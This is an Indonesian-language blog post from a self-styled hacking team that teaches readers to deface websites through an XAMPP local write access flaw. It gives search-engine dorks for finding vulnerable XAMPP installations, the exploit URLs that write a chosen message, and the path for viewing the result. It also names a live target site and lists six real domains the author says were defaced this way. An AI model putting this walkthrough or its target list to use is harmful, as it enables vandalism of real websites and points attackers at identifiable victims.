DEFACE POC XAMPP LOCAL WRITE ACCESS

G HAXOR TEAM

      Yosh bertemu lagi dengan w Anonimokerl :v kali ini w mau share deface poc Xampp Local Write Access.
Okey langsung saja kita siapkan dulu bahan bahannya :v

Bahan :
-Dork :
  1) inurl:/xampp/lang.php
  2) inurl:/security/lang.php
  3) inurl:/xampp/splash.php
  4) inurl:xampp/index.php intitle:XAMPP
kembangin biar banyak web yang masih fress

-Exploit :
   /xampp/lang.php?Hacked_Anonimokerl  (untuk path /xammp atau dork no 1,3,4)
    /security/lang.php?Hacked_Anonimokerl   (untuk path /security atau dork no 2)
Pada Nicknya bisa kalian ganti saja dengan nick kalian masing masing

langkah-langkah :
Seperti biasanya kita dorking dulu di browser :v

Kalo udah kita pilih saja salah satu sitenya :v terus kita tambahkan exploit dibelakang sitenya contoh
Http://site.com/xampp/lang.php?Hacked_Anonimokerl
Kalau vuln maka tampilannya akan seperti ini

Kalo tampilannya udah kayak gitu kita panggil aja hasil defacenya. Caranya yaitu tambahkan /xampp/lang.tmp dibelakang site :v
Maka tampilannya akan seperti ini

Taraaaa sitenya udah kita deface :v

Karena w baik w bakal ngasih lige target untuk mempermudah dalam mempelajari poc ini :v
http://www.colorin.com.ar/security/index.php

Ini adalah contoh hasil deface w pake poc ini :v
https://help.precisionit.net//xampp/lang.tmp
http://bls.dyndns-office.com/security/lang.tmp
http://www.tb-steiner.at/security/lang.tmp
http://imalys.com/security/lang.tmp
http://revolution-x.net//security/lang.tmp
https://umpwr.ac.id/security/lang.tmp

Okey, sekian tutornya mohon maaf bila banyak yang kurang jelas :v
kalo ada yang tidak mengerti bisa ditanyakan aja dengan cara comment :v

Anonimokerl di 09.24

Berbagi

Tidak ada komentar:

Posting Komentar

Link ke posting ini

Buat sebuah Link

‹

›

Beranda

Lihat versi web

Kontributor

AnonimokerlDiky Prabowo 1517Evan Van

Diberdayakan oleh Blogger.